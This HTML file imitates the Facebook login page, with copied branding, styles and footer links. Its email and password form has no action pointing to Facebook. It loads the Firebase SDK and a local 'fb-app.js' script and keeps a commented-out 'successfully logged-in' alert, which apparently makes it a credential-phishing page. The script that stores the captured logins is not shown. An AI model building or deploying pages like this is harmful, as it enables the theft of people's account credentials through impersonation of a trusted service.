<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <style nonce="UQSKpLr1"></style>
    <noscript><meta http-equiv="refresh" content="0; URL=/?_rdc=1&amp;_rdr&amp;_fb_noscript=1" /></noscript>
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
    <title id="pageTitle">Facebook – log in or sign up</title>
    <meta name="bingbot" content="noarchive" />
    <meta name="google" content="notranslate" />
    <meta property="og:site_name" content="Facebook" />
    <meta property="og:url" content="https://web.facebook.com/" />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta property="og:locale" content="en_GB" />
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" />
    <link rel="alternate" media="handheld" href="https://m.facebook.com/" />
    <meta name="description" content="Log in to Facebook to start sharing and connecting with your friends, family and people you know." />
    <link rel="canonical" href="https://web.facebook.com/" />
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/fz3pLUVjq0M.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="qHQJ8qj" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/wlQCqoW6BlE.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="mLH4oHt" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/Sd4hxVfD1hr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="41iDNZ/" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/3SafITy0L64.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="5sp2f89" />
    <style>
        /* Enhanced Facebook Styling */
        body {
            margin: 0;
            padding: 0;
            font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
            background-color: #f0f2f5;
            color: #1c1e21;
            direction: ltr;
            line-height: 1.34;
        }
        
        #content {
            padding-bottom: 112px;
            padding-top: 72px;
        }
        
        ._8esj {
            display: flex;
            margin: 0 auto;
            padding: 20px 0;
            position: relative;
            max-width: 980px;
        }
        
        ._8esl {
            box-sizing: border-box;
            padding-right: 32px;
            width: 580px;
            display: inline-block;
            vertical-align: top;
            padding-top: 20px;
        }
        
        ._8ice {
            margin-bottom: 20px;
            padding: 0;
        }
        
        .fb_logo {
            height: 106px;
            margin: -28px;
        }
        
        ._8eso {
            font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
            font-size: 28px;
            font-weight: normal;
            line-height: 32px;
            width: 500px;
            margin: 0;
            padding: 0 0 20px;
            color: #1c1e21;
        }
        
        ._8esn {
            vertical-align: top;
            width: 396px;
            display: inline-block;
        }
        
        ._8iep {
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
            padding: 20px;
            max-width: 396px;
            margin: 40px 0 0;
        }
        
        ._6luv {
            padding-bottom: 24px;
            padding-top: 10px;
        }
        
        ._6lux {
            margin-bottom: 12px;
        }
        
        .inputtext {
            border: 1px solid #dddfe2;
            color: #1d2129;
            font-family: Helvetica, Arial, sans-serif;
            font-size: 17px;
            height: 22px;
            line-height: 16px;
            padding: 14px 16px;
            width: calc(100% - 34px);
            border-radius: 6px;
            vertical-align: middle;
        }
        
        .inputtext:focus {
            border-color: #1877f2;
            box-shadow: 0 0 0 2px #e7f3ff;
            outline: none;
        }
        
        ._6ltg {
            margin-top: 16px;
            text-align: center;
        }
        
        ._42ft._4jy0 {
            border: none;
            border-radius: 6px;
            font-size: 20px;
            line-height: 48px;
            padding: 0 16px;
            width: 100%;
            font-weight: bold;
            transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
            box-sizing: border-box;
            cursor: pointer;
            text-align: center;
            text-shadow: none;
            -webkit-font-smoothing: antialiased;
        }
        
        ._6lth {
            background-color: #1877f2;
            color: #fff;
        }
        
        ._6lth:hover {
            background-color: #166fe5;
        }
        
        ._6ltj {
            color: #1877f2;
            font-size: 14px;
            font-weight: 500;
            text-align: center;
            margin-top: 16px;
        }
        
        ._6ltj a {
            color: #1877f2;
            text-decoration: none;
        }
        
        ._6ltj a:hover {
            text-decoration: underline;
        }
        
        ._8icz {
            align-items: center;
            border-bottom: 1px solid #dadde1;
            display: flex;
            margin: 20px 0;
            text-align: center;
        }
        
        ._6lti {
            background-color: #42b72a;
            color: #fff;
            text-align: center;
            max-width: 200px;
            margin: 0 auto;
            font-size: 17px;
        }
        
        ._6lti:hover {
            background-color: #36a420;
        }
        
        #reg_pages_msg {
            font-size: 14px;
            font-weight: normal;
            margin-top: 28px;
            text-align: center;
        }
        
        #reg_pages_msg a {
            color: #1c1e21;
            font-weight: 600;
            text-decoration: none;
        }
        
        #reg_pages_msg a:hover {
            text-decoration: underline;
        }
        
        .alert {
            width: auto;
            background: rgb(0, 255, 106);
            padding: 10px 20px;
            border-radius: 5px;
            text-align: center;
            font-size: 18px;
            font-weight: 900;
            display: block;
            color: #3122f8;
            margin-bottom: 15px;
        }
        
        /* Footer */
        ._95ke {
            background-color: #fff;
            padding-bottom: 20px;
            padding-top: 20px;
            margin-top: 20px;
        }
        
        #pageFooter {
            color: #737373;
            margin: 0 auto;
            width: 980px;
            font-size: 12px;
            padding: 20px 0;
        }
    </style>
</head>
<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh  webkit win x1 Locale_en_GB" dir="ltr">
    <div class="_li" id="u_0_1_Eh">
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div>
                    <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                        <div class="_8esk">
                            <div class="_8esl">
                                <div class="_8ice">
                                    <img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Facebook" />
                                </div>
                                <h2 class="_8eso">Facebook helps you connect and share with the people in your life.</h2>
                            </div>
                            <div class="_8esn">
                                <div class="_8iep _8icy _9ahz _9ah-">
                                    <div class="_6luv _52jv">
                                        <form id="myform">
                                            
                                            <!--This is the alert message-->
                                            <!--
                                            <div class="alert">
                                            You have successfuly logged-in</div>
                                            -->

                                            <input type="hidden" name="jazoest" value="2992" autocomplete="off" />
                                            <input type="hidden" name="lsd" value="AVoX02qhwwY" autocomplete="off" />
                                            <div>
                                                <div class="_6lux">
                                                    <input type="text" class="inputtext _55r1 _6luy" name="email" id="email" data-testid="royal_email" placeholder="Email address or phone number" autofocus="1" aria-label="Email address or phone number" />
                                                </div>
                                                <div class="_6lux">
                                                    <input type="password" class="inputtext _55r1 _6luy" name="pass" id="pass" data-testid="royal_pass" placeholder="Password" autofocus="1" aria-label="Pass address or phone number">
                                                </div>
                                            </div>
                                            <input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login" />
                                            <input type="hidden" autocomplete="off" name="next" value="" />
                                            <div class="_6ltg">
                                                <input class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" type="submit" value="Log in">
                                            </div>
                                            <div class="_6ltj"><a href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE1ODg4MTYzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">Forgotten password?</a></div>
                                            <div class="_8icz"></div>
                                            <div class="_6ltg"><a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#" ajaxify="/reg/spotlight/" id="u_0_0_JL" data-testid="open-registration-form-button" rel="async">Create new account</a></div>
                                        </form>
                                    </div>
                                    <div id="reg_pages_msg" class="_58mk"><a href="/pages/create/?ref_type=registration_form" class="_8esh">Create a Page</a> for a celebrity, brand or business.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="">
        <div class="_95ke _8opy">
            <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                <div>
                    <div>
                        <ul style="list-style: none; padding: 0; margin: 0 0 10px; display: flex; flex-wrap: wrap;">
                            <li style="padding-right: 10px; font-size: 12px; color: #737373;">English (UK)</li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">हिन्दी</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">اردو</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">తెలుగు</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">বাংলা</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">தமிழ்</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">ગુજરાતી</a></li>
                            <li style="padding-right: 10px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">ಕನ್ನಡ</a></li>
                        </ul>
                    </div>
                    <div style="border-top: 1px solid #dddfe2; margin-top: 8px; padding-top: 8px;">
                        <ul style="list-style: none; padding: 0; margin: 0; display: flex; flex-wrap: wrap;">
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Sign Up</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Log in</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Messenger</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Facebook Lite</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Video</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Places</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Games</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Marketplace</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Meta Pay</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Meta Store</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Meta Quest</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Instagram</a></li>
                            <li style="padding-right: 20px; margin-bottom: 5px; font-size: 12px;"><a href="#" style="color: #737373; text-decoration: none;">Threads</a></li>
                        </ul>
                    </div>
                    <div style="margin-top: 20px; font-size: 12px; color: #737373;">
                        Meta © 2025
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div>
        <span><img src="https://facebook.com/security/hsts-pixel.gif?c=3.2.5" width="0" height="0" style="display:none" /></span>
    </div>
    <div style="display:none">
        <div></div>
    </div>
    <!-- Link to Firebase JavaScript SDK -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1-0/firebase.js"></script>
    <!-- External JavaScript file -->
    <script src="fb-app.js"></script>
</body>
</html>
